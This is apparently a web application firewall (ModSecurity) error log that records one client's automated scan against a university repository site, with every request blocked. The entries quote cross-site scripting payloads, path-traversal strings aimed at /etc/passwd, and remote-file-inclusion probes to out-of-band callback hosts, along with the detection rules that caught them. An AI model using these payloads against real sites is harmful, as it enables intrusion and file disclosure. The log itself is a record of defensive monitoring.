[Tue Aug 29 11:54:54.410984 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16HsCo-f0AAAoz798AAAAS"]
[Tue Aug 29 11:54:55.725603 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16H8Co-f0AAAqhN-sAAAAE"]
[Tue Aug 29 11:54:56.589644 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0u8gpbgjqdcfwy.oast.site found within TX:1: cjmnijtjmimvgniikdb0u8gpbgjqdcfwy.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/plugins/servlet/oauth/users/icon-uri"] [unique_id "ZO16IMCo-f0AAAoAk80AAAAC"]
[Tue Aug 29 11:54:56.599813 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IMCo-f0AAAqhOAIAAAAE"]
[Tue Aug 29 11:54:57.539335 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\r\\n. [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IcCo-f0AAAoAk9MAAAAC"]
[Tue Aug 29 11:54:57.539384 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\x5cr\\x5cn."] [severity "CRITICAL"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IcCo-f0AAAoAk9MAAAAC"]
[Tue Aug 29 11:54:58.322726 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IsCo-f0AAApk-aoAAAAn"]
[Tue Aug 29 11:54:59.761374 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/CMSPages/GetDocLink.ashx"] [unique_id "ZO16I8Co-f0AAAqTvmsAAAAa"]
[Tue Aug 29 11:55:00.553623 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:service. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:service: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/login/"] [unique_id "ZO16JMCo-f0AAAqhOBkAAAAE"]
[Tue Aug 29 11:55:02.890967 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO16JsCo-f0AAApbUbAAAAAh"]
[Tue Aug 29 11:55:03.891808 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO16J8Co-f0AAAqY5@sAAAAr"]
[Tue Aug 29 11:55:04.575066 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-family. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-family: '/onerror='alert(document.domain)'/b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KMCo-f0AAApXgkoAAAAU"]
[Tue Aug 29 11:55:05.559720 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' onerror=alert(document.domain) b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KcCo-f0AAAqqtaEAAAAA"]
[Tue Aug 29 11:55:06.103688 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO16KsCo-f0AAApXglgAAAAU"]
[Tue Aug 29 11:55:06.543068 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:img. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:img: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/components/com_rwcards/captcha/captcha_image.php"] [unique_id "ZO16KsCo-f0AAAqsV2EAAAAB"]
[Tue Aug 29 11:55:06.615292 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' accesskey='x' onclick='alert(document.domain)' class='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KsCo-f0AAAoz8B4AAAAS"]
[Tue Aug 29 11:55:08.604543 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16LMCo-f0AAAqRzJwAAAAM"]
[Tue Aug 29 11:55:11.631004 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:arr_ajax_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: gnuboard<svg found within ARGS:arr_ajax_msg: gnuboard<svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/plugin/sms5/ajax.sms_emoticon.php"] [unique_id "ZO16L8Co-f0AAApHReQAAAAP"]
[Tue Aug 29 11:55:12.534651 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/wp-admin"] [unique_id "ZO16MMCo-f0AAAqSwpMAAAAN"]
[Tue Aug 29 11:55:12.645540 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/email_passthrough.php"] [unique_id "ZO16MMCo-f0AAAoz8DQAAAAS"]
[Tue Aug 29 11:55:14.650703 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/boafrm/formWlanRedirect"] [unique_id "ZO16MsCo-f0AAApOdi0AAAAL"]
[Tue Aug 29 11:55:15.580965 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:form_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:form_id: xxxxxx\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16M8Co-f0AAApOdjEAAAAL"]
[Tue Aug 29 11:55:16.731673 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:query[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:query[]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16NMCo-f0AAAqY6BcAAAAr"]
[Tue Aug 29 11:55:16.744647 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:note. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:note: </textarea><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/payform.php"] [unique_id "ZO16NMCo-f0AAAqTvpUAAAAa"]
[Tue Aug 29 11:55:17.566829 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/flexible-custom-post-type/edit-post.php"] [unique_id "ZO16NcCo-f0AAAqSwrIAAAAN"]
[Tue Aug 29 11:55:17.714020 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/tiki-featured_link.php"] [unique_id "ZO16NcCo-f0AAAqeFTMAAAAx"]
[Tue Aug 29 11:55:18.649492 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:msg: &#<svg/onload=alert(1337)>;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/message"] [unique_id "ZO16NsCo-f0AAAqY6DMAAAAr"]
[Tue Aug 29 11:55:19.795628 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errmsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:errmsg: ABABAB--><script>alert(1337)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/remote/error"] [unique_id "ZO16N8Co-f0AAAqeFT4AAAAx"]
[Tue Aug 29 11:55:19.874916 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf found within ARGS:wp-submit: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16N8Co-f0AAAqeFUEAAAAx"]
[Tue Aug 29 11:55:20.614510 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:playlist. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:playlist: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/hdw-tube/playlist.php"] [unique_id "ZO16OMCo-f0AAAqsV6IAAAAB"]
[Tue Aug 29 11:55:22.735055 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO16OsCo-f0AAApbUf8AAAAh"]
[Tue Aug 29 11:55:22.771846 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:q: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/templates/m/inc_head.php"] [unique_id "ZO16OsCo-f0AAAqeFVAAAAAx"]
